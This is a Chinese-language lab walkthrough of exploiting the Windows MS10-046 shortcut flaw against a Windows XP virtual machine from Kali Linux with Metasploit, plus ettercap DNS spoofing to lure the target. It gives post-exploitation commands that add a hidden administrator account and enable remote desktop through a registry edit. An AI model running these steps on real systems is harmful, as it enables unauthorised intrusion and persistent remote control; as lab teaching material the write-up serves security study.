一、影响环境
Windows 2000、WindowsXP、Windows server 2003、Windows Vista、Windows server 2008、Windows7 beta。
**二、**实验环境(虚拟机搭建)
目标主机:winxpsp3英文版:192.168.28.133
攻击主机:kaililinux:192.168.28.134
三、攻击过程
先用nmap扫描内部192.168.28.0/24位的网段查看是否有xp系统的主机存活
进入metasploit框架
Msfconsole
使用攻击模块
查看配置信息并设置
设置文件共享服务器的地址,为攻击机器
set srvhost 192.168.28.134
设置自己的ip地址,用于目标机器反弹shell
设置payload 用于反弹shell,这里是windows的
开始攻击
Expolit/run
诱导攻击
能够通过DNS挟持进一步利用MS10-046漏洞
进入到 /etc/ettercap/ 目录下
向目录下的 etter.dns 中添加欺骗的域名:
连接会话
ettercap -T -q -i eth0 -P dns_spoof 192.168.28.133(目标ip)
一些命令
后渗透利用
Getuid
Shell
net user ouyang 123456 /add
net localgroup administrators ouyang /add
创建用户完毕后,打开3389远程桌面连接端口
echo reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
查看机器是否打开了3389
远程桌面连接
链接成功
获取完信息之后删除用户
